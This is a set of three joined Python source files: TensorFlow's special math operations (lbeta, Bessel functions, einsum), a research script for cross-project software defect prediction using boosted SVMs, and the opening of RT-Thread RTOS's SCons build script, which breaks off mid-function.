# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arithmetic Operations that don't fit into math_ops due to dependencies.
To avoid circular dependencies, some math_ops should go here.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import tf_export
# TODO(b/27419586) Change docstring for required dtype of x once int allowed
@tf_export('lbeta')
def lbeta(x, name='lbeta'):
r"""Computes \\(ln(|Beta(x)|)\\), reducing along the last dimension.
Given one-dimensional `z = [z_0,...,z_{K-1}]`, we define
$$Beta(z) = \prod_j Gamma(z_j) / Gamma(\sum_j z_j)$$
And for `n + 1` dimensional `x` with shape `[N1, ..., Nn, K]`, we define
$$lbeta(x)[i1, ..., in] = Log(|Beta(x[i1, ..., in, :])|)$$.
In other words, the last dimension is treated as the `z` vector.
Note that if `z = [u, v]`, then
\\(Beta(z) = int_0^1 t^{u-1} (1 - t)^{v-1} dt\\), which defines the
traditional bivariate beta function.
If the last dimension is empty, we follow the convention that the sum over
the empty set is zero, and the product is one.
Args:
x: A rank `n + 1` `Tensor`, `n >= 0` with type `float`, or `double`.
name: A name for the operation (optional).
Returns:
The logarithm of \\(|Beta(x)|\\) reducing along the last dimension.
"""
# In the event that the last dimension has zero entries, we return -inf.
# This is consistent with a convention that the sum over the empty set 0, and
# the product is 1.
# This is standard. See https://en.wikipedia.org/wiki/Empty_set.
with ops.name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name='x')
# Note reduce_sum([]) = 0.
log_prod_gamma_x = math_ops.reduce_sum(
math_ops.lgamma(x), reduction_indices=[-1])
# Note lgamma(0) = infinity, so if x = []
# log_gamma_sum_x = lgamma(0) = infinity, and
# log_prod_gamma_x = lgamma(1) = 0,
# so result = -infinity
sum_x = math_ops.reduce_sum(x, axis=[-1])
log_gamma_sum_x = math_ops.lgamma(sum_x)
result = log_prod_gamma_x - log_gamma_sum_x
return result
@tf_export('math.bessel_i0')
def bessel_i0(x, name='bessel_i0'):
"""Computes the Bessel i0 function of `x` element-wise.
Modified Bessel function of order 0.
It is preferable to use the numerically stabler function `i0e(x)` instead.
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
@compatibility(scipy)
Equivalent to scipy.special.i0
@end_compatibility
"""
with ops.name_scope(name, [x]):
return math_ops.exp(math_ops.abs(x)) * math_ops.bessel_i0e(x)
@tf_export('math.bessel_i1')
def bessel_i1(x, name='bessel_i1'):
"""Computes the Bessel i1 function of `x` element-wise.
Modified Bessel function of order 1.
It is preferable to use the numerically stabler function `i1e(x)` instead.
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
@compatibility(scipy)
Equivalent to scipy.special.i1
@end_compatibility
"""
with ops.name_scope(name, [x]):
return math_ops.exp(math_ops.abs(x)) * math_ops.bessel_i1e(x)
@tf_export('einsum', 'linalg.einsum')
def einsum(equation, *inputs, **kwargs):
"""A generalized contraction between tensors of arbitrary dimension.
This function returns a tensor whose elements are defined by `equation`,
which is written in a shorthand form inspired by the Einstein summation
convention. As an example, consider multiplying two matrices
A and B to form a matrix C. The elements of C are given by:
```
C[i,k] = sum_j A[i,j] * B[j,k]
```
The corresponding `equation` is:
```
ij,jk->ik
```
In general, the `equation` is obtained from the more familiar element-wise
equation by
1. removing variable names, brackets, and commas,
2. replacing "*" with ",",
3. dropping summation signs, and
4. moving the output to the right, and replacing "=" with "->".
Many common operations can be expressed in this way. For example:
```python
# Matrix multiplication
>>> einsum('ij,jk->ik', m0, m1) # output[i,k] = sum_j m0[i,j] * m1[j, k]
# Dot product
>>> einsum('i,i->', u, v) # output = sum_i u[i]*v[i]
# Outer product
>>> einsum('i,j->ij', u, v) # output[i,j] = u[i]*v[j]
# Transpose
>>> einsum('ij->ji', m) # output[j,i] = m[i,j]
# Batch matrix multiplication
>>> einsum('aij,ajk->aik', s, t) # out[a,i,k] = sum_j s[a,i,j] * t[a, j, k]
```
This function behaves like `numpy.einsum`, but does not support:
* Ellipses (subscripts like `ij...,jk...->ik...`)
* Subscripts where an axis appears more than once for a single input
(e.g. `ijj,k->ik`).
* Subscripts that are summed across multiple inputs (e.g., `ij,ij,jk->ik`).
Args:
equation: a `str` describing the contraction, in the same format as
`numpy.einsum`.
*inputs: the inputs to contract (each one a `Tensor`), whose shapes should
be consistent with `equation`.
name: A name for the operation (optional).
Returns:
The contracted `Tensor`, with shape determined by `equation`.
Raises:
ValueError: If
- the format of `equation` is incorrect,
- the number of inputs implied by `equation` does not match `len(inputs)`,
- an axis appears in the output subscripts but not in any of the inputs,
- the number of dimensions of an input differs from the number of
indices in its subscript, or
- the input shapes are inconsistent along a particular axis.
"""
equation = equation.replace(" ", "")
name = kwargs.pop('name', None)
if kwargs:
raise TypeError('invalid keyword arguments for this function: ' + ', '.join(
[format(key) for key in sorted(list(kwargs.keys()))]))
with ops.name_scope(name, 'einsum', [equation, inputs]) as name:
if '...' in equation:
raise ValueError('Subscripts with ellipses are not yet supported.')
match = re.match('^([a-zA-Z,]+)(->[a-zA-Z]*)?$', equation)
if not match:
raise ValueError('Indices have incorrect format: %s' % equation)
inputs = list(inputs)
input_axis_labels = match.group(1).split(',')
if len(inputs) != len(input_axis_labels):
raise ValueError('Got %d arguments for equation "%s", expecting %d' %
(len(inputs), equation, len(input_axis_labels)))
axis_labels = set(''.join(input_axis_labels))
if match.group(2):
output_axis_labels = match.group(2)[2:]
else:
# infer the output subscripts if not given, assume alphabetical order
indices = ''.join(sorted(axis_labels))
counts = {ax: 0 for ax in indices}
for axes_ in input_axis_labels:
for ax in axes_:
counts[ax] += 1
output_axis_labels = ''.join(
sorted(ax for ax in indices if counts[ax] == 1))
for a in axis_labels:
input_count = sum(1 for s in input_axis_labels if a in s)
if input_count > 2 and a not in output_axis_labels:
logging.warn(
'Falling back to exponential-space implementation of einsum()'
' because index "%s" is summed over more than two inputs.', a)
return _exponential_space_einsum(equation, *inputs)
temp = inputs[0]
temp_axis_labels = input_axis_labels[0]
for i in xrange(len(inputs) - 1):
axes_to_sum = (
set(temp_axis_labels) &
set(input_axis_labels[i + 1]) - set(output_axis_labels))
temp, temp_axis_labels = _einsum_reduction(
temp, temp_axis_labels, inputs[i + 1], input_axis_labels[i + 1],
axes_to_sum)
missing_indices = set(temp_axis_labels) - set(output_axis_labels)
if missing_indices:
reduction_indices = [
i for i, a in enumerate(temp_axis_labels)
if a not in output_axis_labels
]
temp = math_ops.reduce_sum(temp, reduction_indices=reduction_indices)
temp_axis_labels = ''.join(
a for a in temp_axis_labels if a in output_axis_labels)
if sorted(temp_axis_labels) != sorted(output_axis_labels):
raise ValueError('Invalid equation: %s' % equation)
perm = [temp_axis_labels.index(a) for a in output_axis_labels]
return _transpose_if_necessary(temp, perm)
def _einsum_reduction(t0, t0_axis_labels, t1, t1_axis_labels, axes_to_sum):
"""Helper for einsum() that computes the result of a two-argument einsum().
Args:
t0: a `Tensor`
t0_axis_labels: a string of axis labels. This string's length must equal
the rank of t0.
t1: a `Tensor`
t1_axis_labels: a string to axis labels. This string's length must equal
the rank of t1.
axes_to_sum: set of labels of axes to be summed over
Returns:
A `Tensor` whose elements are obtained by summing, over all axes in
`axes_to_sum`, the corresponding elements of `t0` and `t1`.
For example, if t0_axis_labels == 'abijk', t1_axis_labels == 'acjkl', and
axes_to_sum == {j,k}, this will return a tensor x where
out[a,b,c,i,l] = sum_j sum_k t0[a,b,i,j,k] * t1[a,c,j,k,l]
Raises:
ValueError: if the rank of `t0` does not match the length of
`t0_axis_labels`, or that of `t1` does not match the length of
`t1_axis_labels`.
"""
if len(t0_axis_labels) != len(t0.get_shape()):
raise ValueError(
'Tensor t0 of rank %d does not match einsum reduction of length %d' %
(len(t0.get_shape()), len(t0_axis_labels)))
if len(t1_axis_labels) != len(t1.get_shape()):
raise ValueError(
'Tensor t1 of rank %d does not match einsum reduction of length %d' %
(len(t1.get_shape()), len(t1_axis_labels)))
# This function computes the result of a two-argument einsum() using batch
# matrix multiplication. This involves
# 1. transposing t0 and t1 so that axes are in the correct order for
# batch matrix multiplication, and
# 2. reshaping t0 and t1 so that they are both of rank 3.
# First, we divide axes into three groups:
# * "preserved" axes are present in both inputs and the output
# * "summed" axes are present in both inputs but not the output
# * "broadcast" axes are present in exactly one input and the output
#
# As an example, if the einsum is abijk,acjkl->abcil, then "a" is a
# preserved axis, "b" and "c" are broadcast axes, and "j" and "k" are
# summed axes.
assert all(a in t0_axis_labels and a in t1_axis_labels for a in axes_to_sum)
preserved_axes = (set(t0_axis_labels) & set(t1_axis_labels)) - axes_to_sum
broadcast_axes = {}
for i, sym_list in enumerate([t0_axis_labels, t1_axis_labels]):
broadcast_axes[i] = set(sym_list) - preserved_axes - axes_to_sum
# Reorder the axes so that:
# 1. preserved axes come first in both inputs
# 2. in input 0, broadcast axes come next, followed by summed axes
# 3. in input 1, summed axes come next, followed by broadcast axes
def sort_key(input_index, a):
if a in preserved_axes:
return (-1, a)
elif ((input_index == 0 and a in broadcast_axes[0]) or
(input_index == 1 and a in axes_to_sum)):
return (0, a)
else:
return (1, a)
axis_labels = [t0_axis_labels, t1_axis_labels]
sorted_axes = [
sorted(sym_list, key=lambda a: sort_key(i, a))
for i, sym_list in enumerate(axis_labels)
]
inputs = [t0, t1]
for i, axes_str in enumerate(axis_labels):
perm = [axes_str.find(a) for a in sorted_axes[i]]
inputs[i] = _transpose_if_necessary(inputs[i], perm)
t0, t1 = inputs
if not axes_to_sum:
# In the special case where there are no axes to sum over, reduce to mul()
# rather than to batch matrix multiplication.
for _ in broadcast_axes[1]:
t0 = array_ops.expand_dims(t0, -1)
for _ in broadcast_axes[0]:
t1 = array_ops.expand_dims(t1, len(preserved_axes))
product = math_ops.multiply(t0, t1)
product_axes = sorted_axes[0] + sorted_axes[1][len(preserved_axes):]
return product, ''.join(product_axes)
else:
# Reduce to matmul().
# Reshape both inputs so as to combine multiple broadcast axes
# into a single axis, and combine multiple summed axes into a
# single axis.
t0_shape = _get_shape(t0)
num_broadcast_elements_t0 = _total_size(
t0_shape[len(preserved_axes):-len(axes_to_sum)])
num_summed_elements = _total_size(t0_shape[-len(axes_to_sum):])
new_shape = (
t0_shape[:len(preserved_axes)] +
[num_broadcast_elements_t0, num_summed_elements])
t0 = _reshape_if_necessary(t0, new_shape)
t1_shape = _get_shape(t1)
num_broadcast_elements_t1 = _total_size(
t1_shape[len(preserved_axes) + len(axes_to_sum):])
new_shape = (
t1_shape[:len(preserved_axes)] +
[num_summed_elements, num_broadcast_elements_t1])
t1 = _reshape_if_necessary(t1, new_shape)
product = math_ops.matmul(t0, t1)
# Undo compaction of broadcast axes
uncompacted_shape = (
t0_shape[:len(preserved_axes) + len(broadcast_axes[0])] +
t1_shape[len(t1_shape) - len(broadcast_axes[1]):])
product = _reshape_if_necessary(product, uncompacted_shape)
product_axes = (
sorted_axes[0][:len(preserved_axes) + len(broadcast_axes[0])] +
sorted_axes[1][len(sorted_axes[1]) - len(broadcast_axes[1]):])
return product, ''.join(product_axes)
def _transpose_if_necessary(tensor, perm):
"""Like transpose(), but avoids creating a new tensor if possible."""
if perm != range(len(perm)):
return array_ops.transpose(tensor, perm=perm)
else:
return tensor
def _reshape_if_necessary(tensor, new_shape):
"""Like reshape(), but avoids creating a new tensor if possible."""
# Accept None as an alias for -1 in new_shape.
new_shape = tuple(-1 if x is None else x for x in new_shape)
cur_shape = tuple(x.value for x in tensor.get_shape())
if (len(new_shape) == len(cur_shape) and
all(d0 == d1 or d1 == -1 for d0, d1 in zip(cur_shape, new_shape))):
return tensor
else:
return array_ops.reshape(tensor, new_shape)
def _get_shape(tensor):
"""Like get_shape().as_list(), but explicitly queries the shape of a tensor
if necessary to ensure that the returned value contains no unknown value."""
shape = tensor.get_shape().as_list()
none_indices = [i for i, d in enumerate(shape) if d is None]
if none_indices:
# Query the shape if shape contains None values
shape_tensor = array_ops.shape(tensor)
for i in none_indices:
shape[i] = shape_tensor[i]
return shape
def _total_size(shape_values):
"""Given list of tensor shape values, returns total size.
If shape_values contains tensor values (which are results of
array_ops.shape), then it returns a scalar tensor.
If not, it returns an integer."""
result = 1
for val in shape_values:
result *= val
return result
def _exponential_space_einsum(equation, *inputs):
"""Fallback implementation that supports summing an index over > 2 inputs."""
if '...' in equation:
raise ValueError('Subscripts with ellipses are not yet supported.')
match = re.match('^([a-zA-Z,]+)(->[a-zA-Z]*)?$', equation)
if not match:
raise ValueError('Indices have incorrect format: %s' % equation)
inputs = list(inputs)
idx_in = match.group(1).split(',')
idx_all = set(''.join(idx_in))
indices = ''.join(sorted(idx_all))
if match.group(2):
idx_out = match.group(2)[2:]
else:
# infer the output subscripts if not given, assume alphabetical order
counts = {ax: 0 for ax in indices}
for axes_ in idx_in:
for ax in axes_:
counts[ax] += 1
idx_out = ''.join(sorted(ax for ax in indices if counts[ax] == 1))
if len(idx_in) != len(inputs):
raise ValueError('Expected %d inputs but got %d' % (len(idx_in),
len(inputs)))
missing_idx = set(idx_out).difference(idx_all)
if missing_idx:
raise ValueError('Unknown output axes: %s' % missing_idx)
axis_order = {}
for ax in indices:
if ax not in idx_out:
axis_order[ax] = len(axis_order)
for ax in idx_out:
axis_order[ax] = len(axis_order)
# transpose inputs so axes are in order
for i, (input_, axes_) in enumerate(zip(inputs, idx_in)):
if input_.get_shape().ndims != len(axes_):
raise ValueError(
'Input %d with axes %s has incorrect' \
' number of dimensions (expected %d, got %d)' % (
i, axes_, len(axes_), input_.get_shape().ndims
)
)
sorted_idx = sorted(axes_, key=axis_order.get)
if len(set(axes_)) != len(axes_):
raise ValueError(
'Subscript not supported: an axis appears more than once: %s' % axes_)
if list(axes_) != sorted_idx:
permuted = [axes_.find(ax) for ax in sorted_idx]
inputs[i] = array_ops.transpose(input_, permuted)
idx_in[i] = sorted_idx
reduction_idx = []
shapes = [[dim if dim else -1
for dim in tensor.get_shape().as_list()]
for tensor in inputs]
# validate shapes for broadcasting
for j, ax in enumerate(sorted(idx_all, key=axis_order.get)):
dims = []
for i, idx in enumerate(idx_in):
if ax not in idx:
shapes[i].insert(j, 1)
else:
dim = shapes[i][j]
if isinstance(dim, int) and dim > 1:
dims.append(dim)
if len(set(dims)) > 1:
raise ValueError('Dimension mismatch on axis: %s' % ax)
if ax not in idx_out:
reduction_idx.append(j)
# reshape, multiply
expanded_inputs = [
array_ops.reshape(input_, shape) for input_, shape in zip(inputs, shapes)
]
expanded_output = 1
for input_ in expanded_inputs:
expanded_output *= input_
# contract
return math_ops.reduce_sum(expanded_output, reduction_idx)
|
|
from __future__ import print_function, division
import os
import sys
root = os.path.join(os.getcwd().split('src')[0], 'src/defects')
if root not in sys.path:
sys.path.append(root)
from prediction.model import nbayes, rf_model0
from py_weka.classifier import classify
from utils import *
from metrics.abcd import abcd
from metrics.recall_vs_loc import get_curve
from pdb import set_trace
import numpy as np
from collections import Counter
import pandas
from plot.effort_plot import effort_plot
from tabulate import tabulate
from random import random as rand, choice
from sklearn.svm import LinearSVC
from sklearn.metrics import roc_auc_score
def target_details(test_set):
""" Return Max and Min and 'Mass' from the test set """
test_set = test_set[test_set.columns[:-1]]
hi, lo = test_set.max().values, test_set.min().values
return lo, hi
def get_weights(train_set, maxs, mins):
s_i = []
for i in xrange(len(train_set)):
s_i.append((train_set.ix[i].values,
np.sum(
[1 if lo <= val < hi else 0 for lo, val, hi in
zip(mins, train_set.ix[i].values[:-1], maxs)]) / len(
train_set.columns[:-1])))
return s_i
def svm_train(samples):
return
def weight_training(train, test, verbose=False):
def train_validation_split():
""" Split training data into X_train and X_validation"""
sorted_train = sorted(train_w, key=lambda x: x[1], reverse=True)
N = len(sorted_train)
train0, validation = sorted_train[int(N * 2 / 5):], sorted_train[:int(N * 2 / 5)]
return train0, validation
def multiply_dframe(dframe, weight):
assert len(weight) == len(dframe)
N = len(dframe.columns) - 1
wt_array = pd.DataFrame(np.array(N * [weight]).T, columns=dframe.columns[:-1])
new_dframe = dframe.multiply(wt_array)
new_dframe[dframe.columns[-1]] = dframe[dframe.columns[-1]]
return new_dframe[dframe.columns]
def ensemble_measure(lst, classifiers, weigths):
def norm_lst(lst):
import numpy as np
s = np.sum(lst)
arr = np.array(lst) / s
return arr
tst = pd.DataFrame([t[0] for t in lst], columns=train.columns)
X = tst[tst.columns[:-1]]
y = tst[tst.columns[-1]]
y_hat = []
y_pred = []
for clf in classifiers:
y_hat.append(clf.decision_function(X))
if len(y_hat) == 1:
y = [1 if p is "T" else -1 for p in y]
auc = roc_auc_score(y, y_hat[0])
else:
for pred, wgt in zip(y_hat, norm_lst(weigths)):
y_pred.append([wgt * p for p in pred])
y_pred = np.sum(np.array(y_pred).T, axis=1)
y = [1 if p is "T" else -1 for p in y]
auc = roc_auc_score(y, y_pred)
return auc
def resample(train0, weights):
""" The name says it all; resample training set"""
def oversample(lst):
new_lst = []
while len(new_lst) < N:
# set_trace()
a = choice(lst)
b = choice(lst)
c = choice(lst)
r = rand()
new = [x + r * (y - z) for x, y, z in zip(a[0][0][:-1], b[0][0][:-1], c[0][0][:-1])] + [a[0][0][-1]]
new_lst.append(((new, (a[0][1] + b[0][1] + c[0][1]) / 3), a[1] + r * (b[1] - c[1])))
return new_lst
def undersample(lst):
return [choice(lst) for _ in xrange(len(lst))]
klass = [t[0][-1] for t in train0]
count = Counter(klass)
# set_trace()
[major, minor] = sorted(count)[::-1]
N = int(0.5 * (count[minor] + count[major]))
oversamp = []
undersmp = []
therest = []
w_cutoff = np.median(weights)
for w, b in zip(weights, train0):
if b[1] <= w_cutoff and b[0][-1] is minor:
oversamp.append((b, w))
else:
therest.append((b, w))
if b[1] >= w_cutoff and b[0][-1] is major:
undersmp.append((b, w))
else:
therest.append((b, w))
try:
therest.extend(undersample(undersmp))
therest.extend(oversample(oversamp))
except:
pass
weights = [t[1] for t in therest]
therest = [t[0] for t in therest]
return therest, weights
lo, hi = target_details(test)
train_w = get_weights(train, hi, lo)
train0, validation = train_validation_split()
rho_best = 0
h = []
a_m = []
lam = 0.5 # Penalty for each iteration
train1 = train0
w = len(train1) * [1]
a_best = a_m
trn_best = train1
for iter in xrange(5):
if verbose: print("Interation number: {}".format(iter))
train1, w = resample(train1, w)
sim = [t[1] for t in train1]
try:trn = pd.DataFrame([t[0] for t in train1], columns=train.columns)
except:trn = pd.DataFrame([t for t in train1], columns=train.columns)
w_trn = multiply_dframe(trn, w)
# Create an SVM model
X = w_trn[w_trn.columns[:-1]]
y = w_trn[w_trn.columns[-1]]
clf = LinearSVC()
clf.fit(X, y)
h.append(clf)
y_prd = h[-1].predict(X)
e_m = np.sum([w0 if not y_hat == y_act else 0 for w0, y_hat, y_act in zip(w, y_prd, y)]) / np.sum(
w)
a_m.append(lam * np.log((1 - e_m) / (e_m)))
w = [w0 * np.exp(a_m[-1]) if not y_hat == y_act else w0 for w0, y_hat, y_act in zip(w, y_prd, y)]
p_m = ensemble_measure(validation, h, a_m)
if p_m >= rho_best:
if verbose: print("Found better Rho. Previously: {0:.2f} | Now: {1:.2f}".format(rho_best, p_m))
rho_best = p_m
a_best = a_m
trn_best = w_trn
if verbose: print("Boosting terminated. Best Rho={}".format(rho_best))
return trn_best, a_best, h
def predict_defects(test, weights, classifiers):
def norm_lst(lst):
import numpy as np
s = np.sum(lst)
arr = np.array(lst) / s
return arr
X = test[test.columns[:-1]]
y = test[test.columns[-1]]
y_hat = []
y_pred = []
for clf in classifiers:
y_hat.append(clf.decision_function(X))
if len(y_hat) == 1:
actuals = [1 if p > 0 else 0 for p in y]
distribution = y_hat[0]
predicted = [1 if p > 0 else 0 for p in distribution]
else:
for pred, wgt in zip(y_hat, norm_lst(weights)):
y_pred.append([wgt * p for p in pred])
distribution = np.sum(np.array(y_pred).T, axis=1)
actuals = [1 if p is "T" else 0 for p in y]
predicted = [1 if p > 0 else 0 for p in distribution]
return actuals, predicted, distribution
def vcb(source, target, n_rep=12):
"""
TNB: Transfer Naive Bayes
:param source:
:param target:
:param n_rep: number of repeats
:return: result
"""
result = dict()
plot_data = [("Xalan", "Log4j", "Lucene", "Poi", "Velocity")]
for tgt_name, tgt_path in target.iteritems():
stats = []
charts = []
print("{} \r".format(tgt_name[0].upper() + tgt_name[1:]))
val = []
for src_name, src_path in source.iteritems():
if not src_name == tgt_name:
# print("{} \r".format(src_name[0].upper() + src_name[1:]))
src = list2dataframe(src_path.data)
tgt = list2dataframe(tgt_path.data)
pd, pf, g, auc = [], [], [], []
for _ in xrange(n_rep):
_train, clf_w, classifiers = weight_training(train=src, test=tgt)
actual, predicted, distribution = predict_defects(tgt, clf_w, classifiers)
# loc = tgt["$loc"].values
# loc = loc * 100 / np.max(loc)
# recall, loc, au_roc = get_curve(loc, actual, predicted, distribution)
# effort_plot(recall, loc,
# save_dest=os.path.abspath(os.path.join(root, "plot", "plots", tgt_name)),
# save_name=src_name)
p_d, p_f, p_r, rc, f_1, e_d, _g, auroc = abcd(actual, predicted, distribution)
pd.append(p_d)
pf.append(p_f)
g.append(e_d)
auc.append(int(auroc))
stats.append([src_name, int(np.mean(pd)), int(np.std(pd)),
int(np.mean(pf)), int(np.std(pf)),
int(np.mean(auc)), int(np.std(auc))])
stats = pandas.DataFrame(sorted(stats, key=lambda lst: lst[-2], reverse=True), # Sort by G Score
columns=["Name", "Pd (Mean)", "Pd (Std)",
"Pf (Mean)", "Pf (Std)",
"AUC (Mean)", "AUC (Std)"]) # ,
# "G (Mean)", "G (Std)"])
print(tabulate(stats,
headers=["Name", "Pd (Mean)", "Pd (Std)",
"Pf (Mean)", "Pf (Std)",
"AUC (Mean)", "AUC (Std)"],
showindex="never",
tablefmt="fancy_grid"))
result.update({tgt_name: stats})
return result
def tnb_jur():
from data.handler import get_all_projects
all = get_all_projects()
apache = all["Apache"]
return vcb(apache, apache, n_rep=1)
if __name__ == "__main__":
tnb_jur()
|
|
#
# File : building.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2015, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2015-01-20 Bernard Add copyright information
# 2015-07-25 Bernard Add LOCAL_CCFLAGS/LOCAL_CPPPATH/LOCAL_CPPDEFINES for
# group definition.
#
import os
import sys
import string
import utils
from SCons.Script import *
from utils import _make_path_relative
from mkdist import do_copy_file
BuildOptions = {}
Projects = []
Rtt_Root = ''
Env = None
# SCons PreProcessor patch
def start_handling_includes(self, t=None):
"""
Causes the PreProcessor object to start processing #import,
#include and #include_next lines.
This method will be called when a #if, #ifdef, #ifndef or #elif
evaluates True, or when we reach the #else in a #if, #ifdef,
#ifndef or #elif block where a condition already evaluated
False.
"""
d = self.dispatch_table
p = self.stack[-1] if self.stack else self.default_table
for k in ('import', 'include', 'include_next', 'define'):
d[k] = p[k]
def stop_handling_includes(self, t=None):
"""
Causes the PreProcessor object to stop processing #import,
#include and #include_next lines.
This method will be called when a #if, #ifdef, #ifndef or #elif
evaluates False, or when we reach the #else in a #if, #ifdef,
#ifndef or #elif block where a condition already evaluated True.
"""
d = self.dispatch_table
d['import'] = self.do_nothing
d['include'] = self.do_nothing
d['include_next'] = self.do_nothing
d['define'] = self.do_nothing
PatchedPreProcessor = SCons.cpp.PreProcessor
PatchedPreProcessor.start_handling_includes = start_handling_includes
PatchedPreProcessor.stop_handling_includes = stop_handling_includes
class Win32Spawn:
def spawn(self, sh, escape, cmd, args, env):
# deal with the cmd build-in commands which cannot be used in
# subprocess.Popen
if cmd == 'del':
for f in args[1:]:
try:
os.remove(f)
except Exception as e:
print ('Error removing file: ' + e)
return -1
return 0
import subprocess
newargs = ' '.join(args[1:])
cmdline = cmd + " " + newargs
# Make sure the env is constructed by strings
_e = dict([(k, str(v)) for k, v in env.items()])
# Windows(tm) CreateProcess does not use the env passed to it to find
# the executables. So we have to modify our own PATH to make Popen
# work.
old_path = os.environ['PATH']
os.environ['PATH'] = _e['PATH']
try:
proc = subprocess.Popen(cmdline, env=_e, shell=False)
except Exception as e:
print ('Error in calling command:' + cmdline.split(' ')[0])
print ('Exception: ' + os.strerror(e.errno))
if (os.strerror(e.errno) == "No such file or directory"):
print ("\nPlease check Toolchains PATH setting.\n")
return e.errno
finally:
os.environ['PATH'] = old_path
return proc.wait()
# generate cconfig.h file
def GenCconfigFile(env, BuildOptions):
import rtconfig
if rtconfig.PLATFORM == 'gcc':
contents = ''
if not os.path.isfile('cconfig.h'):
import gcc
gcc.GenerateGCCConfig(rtconfig)
# try again
if os.path.isfile('cconfig.h'):
f = open('cconfig.h', 'r')
if f:
contents = f.read()
f.close()
prep = PatchedPreProcessor()
prep.process_contents(contents)
options = prep.cpp_namespace
BuildOptions.update(options)
# add HAVE_CCONFIG_H definition
env.AppendUnique(CPPDEFINES = ['HAVE_CCONFIG_H'])
def PrepareBuilding(env, root_directory, has_libcpu=False, remove_components = []):
import rtconfig
global BuildOptions
global Projects
global Env
global Rtt_Root
# ===== Add option to SCons =====
AddOption('--dist',
dest = 'make-dist',
action = 'store_true',
default = False,
help = 'make distribution')
AddOption('--dist-strip',
dest = 'make-dist-strip',
action = 'store_true',
default = False,
help = 'make distribution and strip useless files')
AddOption('--dist-ide',
dest = 'make-dist-ide',
action = 'store_true',
default = False,
help = 'make distribution for RT-Thread Studio IDE')
AddOption('--project-path',
dest = 'project-path',
type = 'string',
default = None,
help = 'set dist-ide project output path')
AddOption('--project-name',
dest = 'project-name',
type = 'string',
default = None,
help = 'set project name')
AddOption('--reset-project-config',
dest = 'reset-project-config',
action = 'store_true',
default = False,
help = 'reset the project configurations to default')
AddOption('--cscope',
dest = 'cscope',
action = 'store_true',
default = False,
help = 'Build Cscope cross reference database. Requires cscope installed.')
AddOption('--clang-analyzer',
dest = 'clang-analyzer',
action = 'store_true',
default = False,
help = 'Perform static analyze with Clang-analyzer. ' + \
'Requires Clang installed.\n' + \
'It is recommended to use with scan-build like this:\n' + \
'`scan-build scons --clang-analyzer`\n' + \
'If things goes well, scan-build will instruct you to invoke scan-view.')
AddOption('--buildlib',
dest = 'buildlib',
type = 'string',
help = 'building library of a component')
AddOption('--cleanlib',
dest = 'cleanlib',
action = 'store_true',
default = False,
help = 'clean up the library by --buildlib')
AddOption('--target',
dest = 'target',
type = 'string',
help = 'set target project: mdk/mdk4/mdk5/iar/vs/vsc/ua/cdk/ses/makefile/eclipse')
AddOption('--genconfig',
dest = 'genconfig',
action = 'store_true',
default = False,
help = 'Generate .config from rtconfig.h')
AddOption('--useconfig',
dest = 'useconfig',
type = 'string',
help = 'make rtconfig.h from config file.')
AddOption('--verbose',
dest = 'verbose',
action = 'store_true',
default = False,
help = 'print verbose information during build')
Env = env
Rtt_Root = os.path.abspath(root_directory)
# make an absolute root directory
RTT_ROOT = Rtt_Root
Export('RTT_ROOT')
# set RTT_ROOT in ENV
Env['RTT_ROOT'] = Rtt_Root
# set BSP_ROOT in ENV
Env['BSP_ROOT'] = Dir('#').abspath
sys.path = sys.path + [os.path.join(Rtt_Root, 'tools')]
# {target_name:(CROSS_TOOL, PLATFORM)}
tgt_dict = {'mdk':('keil', 'armcc'),
'mdk4':('keil', 'armcc'),
'mdk5':('keil', 'armcc'),
'iar':('iar', 'iar'),
'vs':('msvc', 'cl'),
'vs2012':('msvc', 'cl'),
'vsc' : ('gcc', 'gcc'),
'cb':('keil', 'armcc'),
'ua':('gcc', 'gcc'),
'cdk':('gcc', 'gcc'),
'makefile':('gcc', 'gcc'),
'eclipse':('gcc', 'gcc'),
'ses' : ('gcc', 'gcc')}
tgt_name = GetOption('target')
if tgt_name:
# --target will change the toolchain settings which clang-analyzer is
# depend on
if GetOption('clang-analyzer'):
print ('--clang-analyzer cannot be used with --target')
sys.exit(1)
SetOption('no_exec', 1)
try:
rtconfig.CROSS_TOOL, rtconfig.PLATFORM = tgt_dict[tgt_name]
# replace the 'RTT_CC' to 'CROSS_TOOL'
os.environ['RTT_CC'] = rtconfig.CROSS_TOOL
utils.ReloadModule(rtconfig)
except KeyError:
print ('Unknow target: '+ tgt_name+'. Avaible targets: ' +', '.join(tgt_dict.keys()))
sys.exit(1)
elif (GetDepend('RT_USING_NEWLIB') == False and GetDepend('RT_USING_NOLIBC') == False) \
and rtconfig.PLATFORM == 'gcc':
AddDepend('RT_USING_MINILIBC')
# auto change the 'RTT_EXEC_PATH' when 'rtconfig.EXEC_PATH' get failed
if not os.path.exists(rtconfig.EXEC_PATH):
if 'RTT_EXEC_PATH' in os.environ:
# del the 'RTT_EXEC_PATH' and using the 'EXEC_PATH' setting on rtconfig.py
del os.environ['RTT_EXEC_PATH']
utils.ReloadModule(rtconfig)
# add compability with Keil MDK 4.6 which changes the directory of armcc.exe
if rtconfig.PLATFORM == 'armcc' or rtconfig.PLATFORM == 'armclang':
